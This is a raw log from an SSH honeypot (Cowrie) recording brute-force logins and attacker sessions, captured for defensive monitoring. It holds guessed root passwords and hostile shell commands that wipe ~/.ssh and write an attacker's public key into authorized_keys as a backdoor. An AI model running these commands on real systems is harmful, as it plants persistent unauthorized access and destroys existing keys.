{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:55:31.719590Z","src_ip":"212.227.235.229","session":"dc07c89245c4"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"111111","message":"login attempt [vagrant/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T14:55:32.251874Z","src_ip":"212.227.235.229","session":"dc07c89245c4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:55:33.377043Z","src_ip":"212.227.235.229","session":"dc07c89245c4"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":54312,"dst_ip":"1.2.3.4","dst_port":22,"session":"96fd79a1cf29","protocol":"ssh","message":"New connection: 185.255.91.51:54312 (1.2.3.4:22) [session: 96fd79a1cf29]","sensor":"my-vps","timestamp":"2025-09-08T14:56:01.948321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:56:01.949699Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:56:02.037883Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.login.success","username":"root","password":"Tester123","message":"login attempt [root/Tester123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:56:02.425487Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:56:02.622876Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:56:02.623821Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:56:02.624894Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:02.713596Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:56:03.002489Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:56:03.003422Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:56:03.093009Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:03.093915Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":54322,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cc36363f2c7","protocol":"ssh","message":"New connection: 185.255.91.51:54322 (1.2.3.4:22) [session: 7cc36363f2c7]","sensor":"my-vps","timestamp":"2025-09-08T14:56:03.195516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:56:03.196162Z","src_ip":"185.255.91.51","session":"7cc36363f2c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:56:03.290929Z","src_ip":"185.255.91.51","session":"7cc36363f2c7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:56:03.714061Z","src_ip":"185.255.91.51","session":"7cc36363f2c7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:04.817336Z","src_ip":"185.255.91.51","session":"7cc36363f2c7"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":54326,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aaef5e41942","protocol":"ssh","message":"New connection: 185.255.91.51:54326 (1.2.3.4:22) [session: 4aaef5e41942]","sensor":"my-vps","timestamp":"2025-09-08T14:56:04.908128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:56:04.915190Z","src_ip":"185.255.91.51","session":"4aaef5e41942"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:56:05.007542Z","src_ip":"185.255.91.51","session":"4aaef5e41942"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:56:05.381380Z","src_ip":"185.255.91.51","session":"4aaef5e41942"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:05.471633Z","src_ip":"185.255.91.51","session":"96fd79a1cf29"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:05.478401Z","src_ip":"185.255.91.51","session":"4aaef5e41942"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":39822,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d756aa3308c","protocol":"ssh","message":"New connection: 158.51.124.56:39822 (1.2.3.4:22) [session: 9d756aa3308c]","sensor":"my-vps","timestamp":"2025-09-08T14:56:07.827626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:56:07.828399Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:56:07.967648Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd!!!!","message":"login attempt [root/P@ssw0rd!!!!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:56:08.566902Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:56:08.902723Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:56:08.903453Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:56:08.904590Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:09.044935Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:56:09.342060Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:56:09.342800Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:56:09.484550Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:09.485510Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":40310,"dst_ip":"1.2.3.4","dst_port":22,"session":"94df607c6a37","protocol":"ssh","message":"New connection: 158.51.124.56:40310 (1.2.3.4:22) [session: 94df607c6a37]","sensor":"my-vps","timestamp":"2025-09-08T14:56:09.623132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:56:09.624295Z","src_ip":"158.51.124.56","session":"94df607c6a37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:56:09.763690Z","src_ip":"158.51.124.56","session":"94df607c6a37"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:56:10.363619Z","src_ip":"158.51.124.56","session":"94df607c6a37"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:11.505443Z","src_ip":"158.51.124.56","session":"94df607c6a37"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":41512,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5fcecb8af15","protocol":"ssh","message":"New connection: 158.51.124.56:41512 (1.2.3.4:22) [session: d5fcecb8af15]","sensor":"my-vps","timestamp":"2025-09-08T14:56:11.645508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:56:11.646205Z","src_ip":"158.51.124.56","session":"d5fcecb8af15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:56:11.786524Z","src_ip":"158.51.124.56","session":"d5fcecb8af15"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:56:12.386708Z","src_ip":"158.51.124.56","session":"d5fcecb8af15"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:12.526996Z","src_ip":"158.51.124.56","session":"9d756aa3308c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:12.528326Z","src_ip":"158.51.124.56","session":"d5fcecb8af15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54710,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b9df75a997a","protocol":"ssh","message":"New connection: 212.227.235.229:54710 (1.2.3.4:22) [session: 5b9df75a997a]","sensor":"my-vps","timestamp":"2025-09-08T14:56:34.459039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:56:34.460156Z","src_ip":"212.227.235.229","session":"5b9df75a997a"}
